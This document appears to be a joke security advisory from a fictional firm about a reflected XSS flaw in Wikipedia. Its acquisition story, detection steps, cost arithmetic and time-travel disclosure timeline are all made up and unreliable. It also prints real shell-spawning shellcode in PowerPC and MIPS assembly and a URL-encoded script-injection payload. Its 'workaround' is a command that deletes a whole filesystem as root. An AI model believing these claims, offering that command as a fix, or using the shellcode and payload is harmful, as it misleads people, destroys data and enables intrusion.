[RingoBingo Secuity] Wikipedia Reflected XSS (Unresponsive-Conpulsive Disclosure) RingoBingo TM Security Advisory 09.08.10 http://labs.ringobingo.net/intelligence/vulnerabilities/ Sep 8, 2010 I. BACKGROUND RingoBingo Secuity TM has been finally acquired by Hewlatt Pachard TM for ~11.5M this weekend in a secret meeting in a location near Hanover Street. The sign has been placed on Sunday 12:45 GGM+1,5. The IP agreements between parties require RingoBingo TM to perform Unresponsive-Conpulsive Disclosure of undisclosed cyber-arms to prevent improper dissemination of Copyrights and Other Things TM on the web. While aware that there are many employees of the Internet with the sole scope of Internet washing, it's of primary importance to disseminate this information to prevent proper exploitation by multiple parties and to reduce the global exposure. Hewlatt Pachard TM analysts also demonstrated how it's possible to reduce energy consumption by increasing the global threatcon as red colors consume less power to be displayed than green or yellow/orange ones. II. DESCRIPTION Wikipedia TM software contains code written by intern of Hewlatt Pachard TM and contains undocumented vulnerabilities. Since here at RingoBingo Secuity TM we handle man pages and documentation errors as security issues we urge all the involved, uninvolved and retroinvolved (as well the underinvolved/underdesk ones) patries to patch their man pages by adding the string "-enable-write18" to the parameter list of Wikipedia TM. During a 53-days long penetration test, and for the sole purpose of a proof of concept, our security team was able to successfully access more than 3,400,000 internal pages of the Wikipedia TM system, if we only consider the English-language subsystem. It can be seen that only drastic measures can prevent a large-scale leakage. Moreover we think that, if correctly exploited, this vulnerability can potentially make the core content of the Wikipedia (TM) system world-writable, *even without the need of a privilege escalation*, with easily foreseeable consequences. III. ANALYSIS The vulnerability is present in different Wikipedia php files. Let's analyze one of them. By reverse engineering the file, we have the following asm code: 7c0802a6 mfspr r0,LR 9421fbb0 stu SP,-1104(SP) 90010458 st r0,1112(SP) 3c60f019 cau r3,r0,0xf019 60632c48 lis r3,r3,11336 90610440 st r3,1088(SP) 3c60d002 cau r3,r0,0xd002 60634c0c lis r3,r3,19468 90610444 st r3,1092(SP) 3c602f62 cau r3,r0,0x2f62 6063696e lis r3,r3,26990 90610438 st r3,1080(SP) 3c602f73 cau r3,r0,0x2f73 60636801 lis r3,r3,26625 3863ffff addi r3,r3,-1 9061043c st r3,1084(SP) 30610438 lis r3,SP,1080 7c842278 xor r4,r4,r4 80410440 lwz RTOC,1088(SP) 80010444 lwz r0,1092(SP) 7c0903a6 mtspr CTR,r0 4e800420 bctr RingoBingo EST (Elite Security Team) was aware of the vulnerability and took the situation in hand. The team started to find a way to subvert the application and reverse engineered again the code, obtaining the following: sub $9,$9,$9 add $29,$29,-444 sw $9,444($29) add $29,$29,444 add $29,$29,-4 lui $8,0x2f2f ori $8,$8,0x7368 addi $29,$29,-444 sw $8,444($29) addi $29,$29,444 addi $29,$29,-4 lui $8,0x2f62 ori $8,$8,0x696e addi $29,$29,-444 sw $8,444($29) addi $29,$29,444 addi $29,$29,-4 sw $29,444($29) lw $4,444($29) addi $4,$4,460 addi $4,$4,-456 sub $9,$9,$9 addi $29,$29,-444 sw $9,444($29) addi $29,$29,444 addi $29,$29,-444 sw $4,440($29) sw $29,436($29) lw $5,436($29) addi $5,$5,440 sub $9,$9,$9 andi $6,$9,0xffff li $2,1059 syscall THIS was the final and easy to read code that RingoBingo EST was looking for. One of the intern of the RingoBingo EST recognized this code, he wrote it during a hard-toilet session in his house at Long Beach, and was surprised that his code was used in Wikipedia PHP scripts. He noticed some slight differences between this and his original code. As you can see by these lines: sw $9,444($29) addi $29,$29,444 addi $29,$29,-444 sw $4,440($29) sw $29,436($29) The execution flow is modified by some external influences, that will cost the developer 9,444 US dollars. Again, the math got some miscalculations, as 444 was first added and then substracted (-444). By adding a multiplicative factor of 4,440 we will obtain the total amount to pay: 29,436 US fuckin' dollars. This is a very very uncommon, critical and hard to exploit vulnerability. Our top researchers worked on this for 15'000 days, 24/7, to produce a working and very user unfriendly PoC that allows command execution with root privileges in the context of a little circle printed on a little paper in an anonymous Panama's mailbox. Here's the PoC: http://en.m.wikipedia.org/wiki?search=%27%22%3E%3Cscript%3Ealert%281 23%29%3C%2Fscript%3E IV. DETECTION Detection of this vulnerability is pretty easy. You have to wait for moonlight and hope that it's a full moon night. Then, you need some new-technology 3D glasses to identify monitor interferences caused by this vulnerability. Once equipped with this technology, you have to count all the prime numbers from 1 to 31337 in chinese (Wikipedia IS international), and perform a mind-race-condition on repeating the last prime number 1-3 thousand times. If this mind-race-condition occurs, you will be able to find the vulnerable php scripts on Wikipedia. Oh, I forgot the last condition: you need to sleep while performing these actions. Otherwise your neural waves will interfere with the monitor frequences and the second step of this detection (3d glasses) will fail. That's it. V. WORKAROUND Simply shutdown your services. Our proven and tested technology called "Book" can protect your assets and your clients. Update if you are in the +5 timezone: The following commands will fix the vulnerability, meanwhile the vendor is producing the proper patch: ssh root [at] wikipedia rm -rf / & disown VI. VENDOR RESPONSE We don't belive in responses. We belive in under-deep security and proactive man page reading. VII. CVE INFORMATION VIII. DISCLOSURE TIMELINE 217921.676106 - Man page iSCSI access in read-only 217921.681169 - First I/O error (seek is high, high, high) At this point HAL was shutted down. April 3rd, 0033, 05:55:23 - Sent a mail to vendor but the grave was empty, he resurrected October 10th, 1492, 12:56:22 - Sent a mail to American Headquarters but they didn't understand english July 28th, 1914, 19:12:59 - Sent a mail to European Headquarters but First World War started July 1st, 2001, 13:23:53 - Sent a mail to actual vendor, but product (Wikipedia) was not released yet May 14th, 2045, 22:19:23 - Sent a mail to vendor, with a time machine May 15th, 2045, 22:19:22 - Vendor response, fix ready September 9th, 2010, 01:13:23 - Came back to the present and advisory released You are free to hack until May 15th 2045... enjoy the freshness!